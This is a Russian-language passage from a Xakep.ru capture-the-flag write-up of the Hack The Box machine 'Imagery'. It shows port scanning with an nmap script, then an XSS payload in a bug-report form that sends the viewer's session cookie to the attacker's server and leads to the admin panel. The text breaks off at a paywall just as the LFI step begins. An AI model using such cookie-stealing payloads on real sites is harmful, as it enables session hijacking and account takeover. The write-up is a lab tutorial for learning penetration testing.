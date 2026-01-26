В сегод­няшнем рай­тапе, что­бы получить сес­сию на сер­вере на Linux, мы про­экс­плу­ати­руем цепоч­ку уяз­вимос­тей XSS, LFI и OS Command Injection. Затем раз­добудем учет­ные дан­ные из базы сай­та и повысим при­виле­гии через Charcol Shell.

На­ша конеч­ная цель — получить пра­ва супер­поль­зовате­ля на машине Imagery с учеб­ной пло­щад­ки Hack The Box. Уро­вень слож­ности задания — сред­ний.

warning

К машинам HTB луч­ше под­клю­чать­ся через средс­тва ано­ними­зации и вир­туали­зации. Не делай это­го с компь­юте­ров, где хра­нят­ся важ­ные для тебя дан­ные: ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

 

Разведка

 

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts.

10.10.11.88 imagery.htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Под­робнее про работу с Nmap читай в статье «Nmap с самого начала. Осва­иваем раз­ведку и ска­ниро­вание сети».

Результат работы скрипта
Ре­зуль­тат работы скрип­та

Ска­нер нашел два откры­тых пор­та.

  • 22 — служ­ба OpenSSH 9.7p1;
  • 8000 — веб‑сер­вер на Werkzeug 3.1.3 (Python 3).

Ско­уп малень­кий, перехо­дим к сай­ту на веб‑сер­вере.

Главная страница сайта
Глав­ная стра­ница сай­та
 

Точка входа

На сай­те мож­но зарегис­три­ровать­ся. Соз­даем учет­ную запись и вхо­дим в акка­унт.

Главная страница авторизованного пользователя
Глав­ная стра­ница авто­ризо­ван­ного поль­зовате­ля

На­ходим ссыл­ку на фор­му для отче­тов об ошиб­ках.

Форма для репорта
Фор­ма для репор­та

Так как сооб­щения будут прос­мотре­ны, поп­робу­ем отпра­вить XSS-наг­рузку, которая приш­лет на наш веб‑сер­вер куки поль­зовате­ля, открыв­шего репорт.

За­пус­каем сер­вер:

python -m http.server

И отправ­ляем такую наг­рузку:

<img src=x onerror="document.location='http://10.10.15.73:8000/?c='+ document.cookie">
Форма для репорта
Фор­ма для репор­та
Логи веб-сервера
Ло­ги веб‑сер­вера

Сох­раня­ем получен­ные куки в хра­нили­ще Chrome и перехо­дим в админку.

Хранилище браузера
Хра­нили­ще бра­узе­ра
Панель администратора
Па­нель адми­нис­тра­тора

В панели адми­нис­тра­тора мож­но ска­чать логи.

 

Точка опоры

 

Чтение произвольных файлов

Ме­ханизм заг­рузки логов пос­мотрим через Burp Proxy. Здесь имя фай­ла для заг­рузки переда­ется в GET-парамет­ре log_identifier.

Запрос в Burp Proxy
Зап­рос в Burp Proxy

Продолжение доступно только участникам

Материалы из последних выпусков становятся доступны по отдельности только через два месяца после публикации. Чтобы продолжить чтение, необходимо стать участником сообщества «Xakep.ru».

Присоединяйся к сообществу «Xakep.ru»!

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии